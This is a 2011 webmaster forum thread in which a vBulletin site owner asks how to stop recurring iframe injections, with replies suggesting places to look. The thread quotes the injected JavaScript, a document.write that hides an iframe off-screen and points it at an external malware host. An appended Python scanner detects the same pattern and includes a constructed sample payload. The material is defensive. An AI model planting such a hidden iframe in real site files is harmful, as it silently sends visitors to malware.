Forum Moderators: phranque


A way to stop malicious iframes?

         

dutchbb

5:23 pm on May 4, 2011 (gmt 0)

10+ Year Member



Hello

My vbulletin site suffers from malicious iframe injections and unfortunately I cannot find a way to remove them. I've tried everything from changing passwords and securing my computer to updating scripts and server security. They just keep coming back and it's driving me and my users crazy!

Is there a way to at least stop iframes from working on a server? So that they do not redirect visitors to malicious websites hosting malware?

Thanks

dutchbb

7:40 pm on May 6, 2011 (gmt 0)

10+ Year Member



Bump.

londrum

8:06 pm on May 6, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



do you mean that they are appearing inside people's posts?
maybe you can just disallow HTML in posts.

if they are appearing on the actual site, then there must be a file somewhere on your server that is inserting them. it could be anything, anywhere... try looking for weird stuff in a .htaccess file, or strange files that have been placed outside of your root.

dutchbb

8:13 pm on May 6, 2011 (gmt 0)

10+ Year Member



Ok thanks.

It's injected in this file: /clientscript/vbulletin_global.js?v=386

This code:

document.write('<style>.x4chsze0 { position:absolute; left:-1764px; top:-1518px} </style> <div class="x4chsze0"><iframe src="http://example.cz.cc/********/counter.php?id=2"></iframe></div>');

I have been looking how they do it but have not found anything so far.

[edited by: tedster at 5:43 am (utc) on May 7, 2011]
[edit reason] obscure the src to avoid malicious code [/edit]

londrum

8:25 pm on May 6, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



there's probably another file that is inserting it into that file, even after you delete the reference.

if it was me, i would scrap that file completely. take out the bits that you need, and create a new .js file. give it a brand new name.

and then delete all the <script> bits that point to it in the template files. hard code a new URL into the <script> bits which point to your new file instead.

that way, even if you can't find out how the file is getting amended, it will never be delivered to the users.

dutchbb

8:38 pm on May 6, 2011 (gmt 0)

10+ Year Member



I wish I could, but this is part of a script (vbulletin) and I have no idea how to tweak it. Also they have been injecting this code in other js files.

I think you may be right about there being another file on the server...

londrum

8:43 pm on May 6, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



or maybe it's in the database, can you search the database with something like phpmyadmin?

search for phrases that appear in the code, like "position:absolute"
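
A read-only triage scan for the pattern quoted earlier in this thread (a document.write() that emits an iframe parked off-screen with large negative left/top offsets), added here as an example and not written by any poster or taken from vBulletin. The function names, the list of file extensions and the SAMPLE string are assumptions made for illustration; SAMPLE is constructed and uses a placeholder domain.

```python
import os
import re
import sys

# document.write(...) whose argument contains an <iframe> tag (bounded span).
DOC_WRITE_IFRAME = re.compile(
    r"document\.write\s*\((?P<arg>.{0,2000}?<iframe\b.{0,2000}?)\)\s*;", re.I | re.S)
# CSS that parks an element far off-screen, e.g. left:-1764px.
OFFSCREEN = re.compile(r"(?:left|top)\s*:\s*-\s*\d{3,}px", re.I)
IFRAME_SRC = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

# Constructed sample: a harmless function followed by an appended injection.
SAMPLE = (
    "function fetch_object(id) { return document.getElementById(id); }\n"
    "document.write('<style>.x1 { position:absolute; left:-1764px; "
    "top:-1518px} </style> <div class=\"x1\"><iframe "
    "src=\"http://injected.example/counter.php?id=2\"></iframe></div>');\n"
)


def find_injected_iframes(text):
    """Return one finding per document.write() call that emits an iframe."""
    findings = []
    for m in DOC_WRITE_IFRAME.finditer(text):
        arg = m.group("arg")
        src = IFRAME_SRC.search(arg)
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "src": src.group(1) if src else None,
            "hidden_offscreen": bool(OFFSCREEN.search(arg)),
        })
    return findings


def scan_tree(root, extensions=(".js", ".php", ".html")):
    """Walk root (read-only) and return {path: findings} for files with hits."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(extensions):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    found = find_injected_iframes(fh.read())
                if found:
                    hits[path] = found
    return hits


if __name__ == "__main__":
    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for f in found:
            print(f"{path}:{f['line']} src={f['src']} hidden={f['hidden_offscreen']}")
```

A hit only shows which files currently carry the injection; comparing those files' modification times against the web server and FTP logs is what narrows down how they are being rewritten.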